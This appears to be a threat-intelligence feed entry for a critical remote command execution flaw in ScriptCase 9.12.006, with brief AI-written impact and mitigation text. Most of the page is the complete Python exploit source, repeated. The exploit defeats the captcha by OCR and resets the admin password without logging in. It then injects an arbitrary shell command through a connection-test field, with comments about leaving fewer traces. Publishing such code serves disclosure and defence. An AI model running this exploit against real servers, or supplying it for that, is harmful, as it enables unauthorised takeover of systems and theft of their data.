ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)

Severity: criticalType: exploit

AI Analysis

Technical Summary

The reported security threat concerns a Remote Command Execution (RCE) vulnerability in ScriptCase version 9.12.006 (build 23). ScriptCase is a widely used PHP code generator and rapid web application development tool that enables developers to create web applications quickly. An RCE vulnerability in this context means that an attacker can remotely execute arbitrary system commands on the server hosting ScriptCase without proper authorization or authentication. This type of vulnerability is particularly severe because it allows attackers to gain full control over the affected system, potentially leading to data theft, system compromise, lateral movement within networks, or deployment of malware such as ransomware. The exploit code is publicly available and written in Python, which lowers the barrier for attackers to weaponize this vulnerability. Although no specific affected sub-versions are listed, the mention of version 9.12.006 (23) indicates that this particular build is vulnerable. No official patches or mitigations have been linked yet, increasing the urgency for organizations using this software to take immediate protective measures. The absence of known exploits in the wild suggests this is a newly disclosed vulnerability, but the presence of exploit code means that active exploitation could emerge rapidly.

Potential Impact

For European organizations, the impact of this RCE vulnerability can be significant. ScriptCase is used by various enterprises and government agencies for internal and external web application development. Successful exploitation could lead to unauthorized access to sensitive data, disruption of critical services, and compromise of internal networks. Given the GDPR regulations in Europe, any data breach resulting from this vulnerability could lead to substantial fines and reputational damage. Additionally, attackers could leverage this vulnerability to deploy ransomware or conduct espionage, especially targeting sectors such as finance, healthcare, and public administration, which are heavily reliant on web applications and have stringent data protection requirements. The ability to execute arbitrary commands remotely without authentication makes this vulnerability a high-risk vector for attackers aiming to establish persistent footholds or exfiltrate data.

Mitigation Recommendations

Since no official patches are currently linked, European organizations should immediately implement compensating controls. These include isolating the ScriptCase server from public internet access using network segmentation and firewalls, restricting access to trusted IP addresses only, and monitoring logs for unusual command execution patterns. Organizations should also consider disabling or uninstalling ScriptCase instances if not actively used. Employing Web Application Firewalls (WAFs) with custom rules to detect and block suspicious payloads targeting ScriptCase can reduce exploitation risk. Regular backups of critical data and system snapshots should be maintained to enable rapid recovery in case of compromise. Organizations should stay alert for official patches or updates from ScriptCase vendors and apply them promptly once available. Conducting internal vulnerability scans and penetration tests focusing on ScriptCase deployments can help identify exposure. Finally, educating developers and system administrators about this vulnerability and safe coding practices will help prevent similar issues in the future.

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Sweden, Poland

Indicators of Compromise

exploit-code: # Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) # Date: 04/07/2025 # Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir) # Vendor Homepage: https://www.scriptcase.net/ # Software Link: https://www.scriptcase.net/download/ # Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase) # Tested on: EndeavourOS # CVE : CVE-2025-47227, CVE-2025-47228 # Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228 # Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution # Imports ## stdlib import io import random import optparse import re import string import sys import urllib.parse ## third party from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow import pytesseract # pip3 install pytesseract import requests # pip install requests from bs4 import BeautifulSoup # pip install beautifulsoup4 # Clean image + OCR def process_image(input_image, output_image_path=None): # Open the image img = Image.open(io.BytesIO(input_image)) # Convert the image to RGB (in case it's in a different mode) img = img.convert('RGB') # Load the pixel data pixels = img.load() # Get the dimensions of the image width, height = img.size # Process each pixel for y in range(height): for x in range(width): r, g, b = pixels[x, y] # Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white) if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255): pixels[x, y] = (211, 211, 211) # Change the pixel to light grey elif (r, g, b) == (255, 255, 255): # Change white text in black text pixels[x, y] = (0, 0, 0) # Change the pixel to black # Size (200, 50) * 5 img = img.resize((1000,250), Image.Resampling.HAMMING) # Use Tesseract to convert the image to text # psm 6 or 8 work best # limit alphabet # disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative text = pytesseract.image_to_string(img, config=custom_oem_psm_config) return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added # Step 1: Set is_page to true on the session def prepare_session(url_base, cookies): res = requests.get( f'{url_base}/prod/lib/php/devel/iface/login.php', cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Session prepared") else: print(f"[-] Failed with status code {res.status_code}") # Random hex string of arbitrary size def rand_hex(size): return ''.join(random.choice('0123456789abcdef') for _ in range(size)) # Step 2: Get a captcha challenge for the session def captcha_session(url_base, cookies): res = requests.get( f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php', cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Captcha retrieved") return res.content else: print(f"[-] Failed with status code {res.status_code}") # Step 3: Change the password with the prepared session def reset_password(url_base, cookies, captcha_img, captcha_txt): new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9)) email = f'{rand_hex(10)}@{rand_hex(8)}.com' data = { 'ajax': 'nm', 'nm_action': 'change_pass', 'email': email, 'pass_new': new_password, 'pass_conf': new_password, 'lang': 'en-us', 'captcha': captcha_txt } res = requests.post( f'{url_base}/prod/lib/php/devel/iface/login.php', data=data, cookies=cookies, verify=False ) if res.status_code == 200 and res.text == '{"result":"success"}': print("[+] Password reset successfully") print(f"[+] The new password is: {new_password}") print(f"[+] The delcared (fake) email address was: {email}") elif res.status_code == 200 and res.text == '{"result":"error","message":"Invalid captcha"}': print("[-] OCR failed") print(f"[-] Failed captcha submission was {captcha_txt}") img = Image.open(io.BytesIO(captcha_img)) img.show() manual_input = input("[+] Input displayed captcha to retry manually: ") reset_password(url_base, cookies, captcha_img, manual_input) elif res.status_code == 200 and res.text == '{"result":"error","message":"The password is incorrect."}': print("[-] Non default password policy") print("[-] Hardcode a password that matches it") print(f"[-] Failed password is: {new_password}") else: print(f"[-] Failed with status code {res.status_code}") print(res.text) print('[-] Data was:') print(data) # Detect the deployment path of ScriptCase and produciton environment from the homepage. # E.g. deployment path is /scriptcase/ # sc_pathToTB variable on http://10.58.8.213/ will be '/scriptcase/prod/third/jquery_plugin/thickbox/' # ScriptCase login page => http://10.58.8.213/scriptcase/devel/iface/login.php # Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php def detect_deployment_path(homepage_url): res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects) if res.status_code == 200: print("[+] Looking for deployment path in JS and computing login paths") reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';" match = re.search(reg, res.text) # compute URL without path parsed_url = urllib.parse.urlparse(homepage_url) homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}" if match: base_path = match.group(1) print(f"[+] Deployment path found: {base_path}/") print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)") print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php") else: # either a website not made with ScriptCase or root redirects to the devel page js_redirect(res) # try to detect the devel/iface/login.php page reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first' match = re.search(reg2, res.text) if match: # devel page print(f"[?] This may be the development console?") # now try to extract path from favicon reg3 = r'<link rel="shortcut icon" href="(.+)/devel/conf/scriptcase/img/ico/favicon\.ico"' match = re.search(reg3, res.text) if match: # base path found base_path = match.group(1) print(f"[+] Deployment path found: {base_path}/") print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php") print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php") else: # false positive, it's not devel page print(f"[-] Failed to find deployment path, is this site made with ScriptCase?") else: # no ScriptCase detected print("[-] Failed to find deployment path, is this site made with ScriptCase?") else: print(f"[-] Failed with status code {res.status_code}") # Try to handle JS redirect else warn and exit def js_redirect(res): if re.search(r'window\.location', res.text): print('[-] JavaScript redirection detected') print('[-] JavaScript redirection not handled (no headless browser with JS engine)') print(f"[-] Returned page is:\n{res.text}") print(f"[-] Last redirection URL is:\n{res.url}") match = re.search(r"window\.location\s*=\s*['\"](.+)['\"]", res.text) if match: redirect_url = f"{res.url}/{match.group(1)}" print(f"[?] Let's try again with: {redirect_url}") detect_deployment_path(redirect_url) else: print('Please try again with redirect URL') exit(1) # Remote command execution on the system # # Instead of registering a new connection (admin_sys_allconections_create_wizard.php), we can just test it # (admin_sys_allconections_test.php) so we leave less traces. # Even if the test results in "Connection Error" / "Unable to connect", the command was stil lexecuted. def command_injection(url_base, cookies, cmd): data = { 'hid_create_connect': 'S', 'dbms': 'mysql', 'conn': 'conn_mysql', 'dbms': 'pdo_mysql', 'host': '127.0.0.1:3306', 'server': '127.0.0.1', 'port': '3306', 'user': rand_hex(11), 'pass': rand_hex(8), 'show_table': 'Y', 'show_view': 'Y', 'show_system': 'Y', 'show_procedure': 'Y', 'decimal': '.', 'use_persistent': 'N', 'use_schema': 'N', 'retrieve_schema': 'Y', 'retrieve_schema': 'Y', 'use_ssh': 'Y', 'ssh_server': '127.0.0.1', 'ssh_user': 'root', 'ssh_port': '22', 'ssh_localportforwarding': f'; {cmd};#', 'ssh_localserver': '127.0.0.1', 'ssh_localport': '3306', 'form_create': form_create(url_base, cookies), 'retornar': 'Back', 'concluir': 'Save', 'confirmar': 'Back', 'voltar': 'Confirm', 'step': 'sgdb2', 'nextstep': 'dados_rep' } res = requests.post( f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_test.php', data=data, cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Command executed (blind)") else: print(f"[-] Failed with status code {res.status_code}") exit(1) # Get form_create ID for command_injection() def form_create(url_base, cookies): res = requests.get( f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_create_wizard.php', cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Parsing results to find form_create ID") soup = BeautifulSoup(res.text, 'html.parser') form_create = soup.css.select_one('html body.nmPage form input[name="form_create"]') if form_create: form_create_id = form_create.get('value') print(f"[+] form_create ID found: {form_create_id}") return form_create_id else: print("[-] No form_create ID found") exit(1) return res.content else: print(f"[-] Failed with status code {res.status_code}") exit(1) # Handles login # # Comes with a cookie as there is session fixation (cookie not renewed after login) def login(url_base, cookies, password): data = { 'option': 'login', 'opt_par': None, 'hid_login': 'S', 'field_pass': password, 'field_language': 'en-us' } res = requests.post( f'{url_base}/prod/lib/php/nm_ini_manager2.php', data=data, cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Authentication successful") else: print("[-] Authentication failed") # Exploit if __name__ == '__main__': help_text = """ Examples: Pre-Auth RCE (password reset + RCE) python exploit.py -u http://example.org/scriptcase -c "command" Password reset only (no auth) python exploit.py -u http://example.org/scriptcase RCE only (need account) python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*' Detect deployment path python exploit.py -u http://example.org/ -d """ parser = optparse.OptionParser(usage=help_text) parser.add_option('-u', '--base-url') parser.add_option('-c', '--command') parser.add_option('-p', '--password') parser.add_option('-d', '--detect', action='store_true', dest='detect') opts, args = parser.parse_args() cookies = { 'PHPSESSID': rand_hex(26) # Simulate a random PHPSESSID (more stealth than an arbitrary string) } URL_BASE = opts.base_url if opts.base_url and opts.command and not opts.password and not opts.detect: # Pre-Auth RCE (password reset + RCE) prepare_session(URL_BASE, cookies) captcha_img = captcha_session(URL_BASE, cookies) captcha_txt = process_image(captcha_img) reset_password(URL_BASE, cookies, captcha_img, captcha_txt) command_injection(URL_BASE, cookies, opts.command) elif opts.base_url and not opts.command and not opts.password and not opts.detect: # Password reset only (no auth) prepare_session(URL_BASE, cookies) captcha_img = captcha_session(URL_BASE, cookies) captcha_txt = process_image(captcha_img) reset_password(URL_BASE, cookies, captcha_img, captcha_txt) elif opts.base_url and opts.command and opts.password and not opts.detect: # RCE only (need account) prepare_session(URL_BASE, cookies) login(URL_BASE, cookies, opts.password) command_injection(URL_BASE, cookies, opts.command) elif opts.base_url and not opts.command and not opts.password and opts.detect: # Detect deployment path detect_deployment_path(URL_BASE) else: parser.print_help() sys.exit(1)

ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)

Severity: critical

Type: exploit

ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Sweden, Poland

Indicators of Compromise

exploit-code: # Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) # Date: 04/07/2025 # Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir) # Vendor Homepage: https://www.scriptcase.net/ # Software Link: https://www.scriptcase.net/download/ # Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase) # Tested on: EndeavourOS # CVE : CVE-2025-47227, CVE-2025-47228 # Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228 # Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution # Imports ## stdlib import io import random import optparse import re import string import sys import urllib.parse ## third party from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow import pytesseract # pip3 install pytesseract import requests # pip install requests from bs4 import BeautifulSoup # pip install beautifulsoup4 # Clean image + OCR def process_image(input_image, output_image_path=None): # Open the image img = Image.open(io.BytesIO(input_image)) # Convert the image to RGB (in case it's in a different mode) img = img.convert('RGB') # Load the pixel data pixels = img.load() # Get the dimensions of the image width, height = img.size # Process each pixel for y in range(height): for x in range(width): r, g, b = pixels[x, y] # Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white) if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255): pixels[x, y] = (211, 211, 211) # Change the pixel to light grey elif (r, g, b) == (255, 255, 255): # Change white text in black text pixels[x, y] = (0, 0, 0) # Change the pixel to black # Size (200, 50) * 5 img = img.resize((1000,250), Image.Resampling.HAMMING) # Use Tesseract to convert the image to text # psm 6 or 8 work best # limit alphabet # disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative text = pytesseract.image_to_string(img, config=custom_oem_psm_config) return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added # Step 1: Set is_page to true on the session def prepare_session(url_base, cookies): res = requests.get( f'{url_base}/prod/lib/php/devel/iface/login.php', cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Session prepared") else: print(f"[-] Failed with status code {res.status_code}") # Random hex string of arbitrary size def rand_hex(size): return ''.join(random.choice('0123456789abcdef') for _ in range(size)) # Step 2: Get a captcha challenge for the session def captcha_session(url_base, cookies): res = requests.get( f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php', cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Captcha retrieved") return res.content else: print(f"[-] Failed with status code {res.status_code}") # Step 3: Change the password with the prepared session def reset_password(url_base, cookies, captcha_img, captcha_txt): new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9)) email = f'{rand_hex(10)}@{rand_hex(8)}.com' data = { 'ajax': 'nm', 'nm_action': 'change_pass', 'email': email, 'pass_new': new_password, 'pass_conf': new_password, 'lang': 'en-us', 'captcha': captcha_txt } res = requests.post( f'{url_base}/prod/lib/php/devel/iface/login.php', data=data, cookies=cookies, verify=False ) if res.status_code == 200 and res.text == '{"result":"success"}': print("[+] Password reset successfully") print(f"[+] The new password is: {new_password}") print(f"[+] The delcared (fake) email address was: {email}") elif res.status_code == 200 and res.text == '{"result":"error","message":"Invalid captcha"}': print("[-] OCR failed") print(f"[-] Failed captcha submission was {captcha_txt}") img = Image.open(io.BytesIO(captcha_img)) img.show() manual_input = input("[+] Input displayed captcha to retry manually: ") reset_password(url_base, cookies, captcha_img, manual_input) elif res.status_code == 200 and res.text == '{"result":"error","message":"The password is incorrect."}': print("[-] Non default password policy") print("[-] Hardcode a password that matches it") print(f"[-] Failed password is: {new_password}") else: print(f"[-] Failed with status code {res.status_code}") print(res.text) print('[-] Data was:') print(data) # Detect the deployment path of ScriptCase and produciton environment from the homepage. # E.g. deployment path is /scriptcase/ # sc_pathToTB variable on http://10.58.8.213/ will be '/scriptcase/prod/third/jquery_plugin/thickbox/' # ScriptCase login page => http://10.58.8.213/scriptcase/devel/iface/login.php # Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php def detect_deployment_path(homepage_url): res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects) if res.status_code == 200: print("[+] Looking for deployment path in JS and computing login paths") reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';" match = re.search(reg, res.text) # compute URL without path parsed_url = urllib.parse.urlparse(homepage_url) homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}" if match: base_path = match.group(1) print(f"[+] Deployment path found: {base_path}/") print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)") print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php") else: # either a website not made with ScriptCase or root redirects to the devel page js_redirect(res) # try to detect the devel/iface/login.php page reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first' match = re.search(reg2, res.text) if match: # devel page print(f"[?] This may be the development console?") # now try to extract path from favicon reg3 = r'<link rel="shortcut icon" href="(.+)/devel/conf/scriptcase/img/ico/favicon\.ico"' match = re.search(reg3, res.text) if match: # base path found base_path = match.group(1) print(f"[+] Deployment path found: {base_path}/") print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php") print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php") else: # false positive, it's not devel page print(f"[-] Failed to find deployment path, is this site made with ScriptCase?") else: # no ScriptCase detected print("[-] Failed to find deployment path, is this site made with ScriptCase?") else: print(f"[-] Failed with status code {res.status_code}") # Try to handle JS redirect else warn and exit def js_redirect(res): if re.search(r'window\.location', res.text): print('[-] JavaScript redirection detected') print('[-] JavaScript redirection not handled (no headless browser with JS engine)') print(f"[-] Returned page is:\n{res.text}") print(f"[-] Last redirection URL is:\n{res.url}") match = re.search(r"window\.location\s*=\s*['\"](.+)['\"]", res.text) if match: redirect_url = f"{res.url}/{match.group(1)}" print(f"[?] Let's try again with: {redirect_url}") detect_deployment_path(redirect_url) else: print('Please try again with redirect URL') exit(1) # Remote command execution on the system # # Instead of registering a new connection (admin_sys_allconections_create_wizard.php), we can just test it # (admin_sys_allconections_test.php) so we leave less traces. # Even if the test results in "Connection Error" / "Unable to connect", the command was stil lexecuted. def command_injection(url_base, cookies, cmd): data = { 'hid_create_connect': 'S', 'dbms': 'mysql', 'conn': 'conn_mysql', 'dbms': 'pdo_mysql', 'host': '127.0.0.1:3306', 'server': '127.0.0.1', 'port': '3306', 'user': rand_hex(11), 'pass': rand_hex(8), 'show_table': 'Y', 'show_view': 'Y', 'show_system': 'Y', 'show_procedure': 'Y', 'decimal': '.', 'use_persistent': 'N', 'use_schema': 'N', 'retrieve_schema': 'Y', 'retrieve_schema': 'Y', 'use_ssh': 'Y', 'ssh_server': '127.0.0.1', 'ssh_user': 'root', 'ssh_port': '22', 'ssh_localportforwarding': f'; {cmd};#', 'ssh_localserver': '127.0.0.1', 'ssh_localport': '3306', 'form_create': form_create(url_base, cookies), 'retornar': 'Back', 'concluir': 'Save', 'confirmar': 'Back', 'voltar': 'Confirm', 'step': 'sgdb2', 'nextstep': 'dados_rep' } res = requests.post( f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_test.php', data=data, cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Command executed (blind)") else: print(f"[-] Failed with status code {res.status_code}") exit(1) # Get form_create ID for command_injection() def form_create(url_base, cookies): res = requests.get( f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_create_wizard.php', cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Parsing results to find form_create ID") soup = BeautifulSoup(res.text, 'html.parser') form_create = soup.css.select_one('html body.nmPage form input[name="form_create"]') if form_create: form_create_id = form_create.get('value') print(f"[+] form_create ID found: {form_create_id}") return form_create_id else: print("[-] No form_create ID found") exit(1) return res.content else: print(f"[-] Failed with status code {res.status_code}") exit(1) # Handles login # # Comes with a cookie as there is session fixation (cookie not renewed after login) def login(url_base, cookies, password): data = { 'option': 'login', 'opt_par': None, 'hid_login': 'S', 'field_pass': password, 'field_language': 'en-us' } res = requests.post( f'{url_base}/prod/lib/php/nm_ini_manager2.php', data=data, cookies=cookies, verify=False ) if res.status_code == 200: print("[+] Authentication successful") else: print("[-] Authentication failed") # Exploit if __name__ == '__main__': help_text = """ Examples: Pre-Auth RCE (password reset + RCE) python exploit.py -u http://example.org/scriptcase -c "command" Password reset only (no auth) python exploit.py -u http://example.org/scriptcase RCE only (need account) python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*' Detect deployment path python exploit.py -u http://example.org/ -d """ parser = optparse.OptionParser(usage=help_text) parser.add_option('-u', '--base-url') parser.add_option('-c', '--command') parser.add_option('-p', '--password') parser.add_option('-d', '--detect', action='store_true', dest='detect') opts, args = parser.parse_args() cookies = { 'PHPSESSID': rand_hex(26) # Simulate a random PHPSESSID (more stealth than an arbitrary string) } URL_BASE = opts.base_url if opts.base_url and opts.command and not opts.password and not opts.detect: # Pre-Auth RCE (password reset + RCE) prepare_session(URL_BASE, cookies) captcha_img = captcha_session(URL_BASE, cookies) captcha_txt = process_image(captcha_img) reset_password(URL_BASE, cookies, captcha_img, captcha_txt) command_injection(URL_BASE, cookies, opts.command) elif opts.base_url and not opts.command and not opts.password and not opts.detect: # Password reset only (no auth) prepare_session(URL_BASE, cookies) captcha_img = captcha_session(URL_BASE, cookies) captcha_txt = process_image(captcha_img) reset_password(URL_BASE, cookies, captcha_img, captcha_txt) elif opts.base_url and opts.command and opts.password and not opts.detect: # RCE only (need account) prepare_session(URL_BASE, cookies) login(URL_BASE, cookies, opts.password) command_injection(URL_BASE, cookies, opts.command) elif opts.base_url and not opts.command and not opts.password and opts.detect: # Detect deployment path detect_deployment_path(URL_BASE) else: parser.print_help() sys.exit(1)

Source: Exploit-DB RSS Feed

Published: Tue Jul 08 2025

ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)

Critical

Exploitremote rce exploit

Published: Tue Jul 08 2025 (07/08/2025, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)

AI-Powered Analysis

AILast updated: 07/16/2025, 21:21:51 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Get Pro

Pro Feature

For access to advanced analysis and higher rate limits, contact root@offseq.com

Technical Details

Edb Id: 52353
Has Exploit Code: true
Code Language: python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)

# Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)
# Date: 04/07/2025
# Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir)
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase)
# Tested on: EndeavourOS
# CVE : CVE-2025-47227, CVE-2025-47228
# Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228
# Advisory: https://w... (13545 more characters)

Code Length: 14,045 characters

Threat ID: 686e74f66f40f0eb72042ded

Added to database: 7/9/2025, 1:56:06 PM

Last enriched: 7/16/2025, 9:21:51 PM

Last updated: 8/22/2025, 8:46:21 AM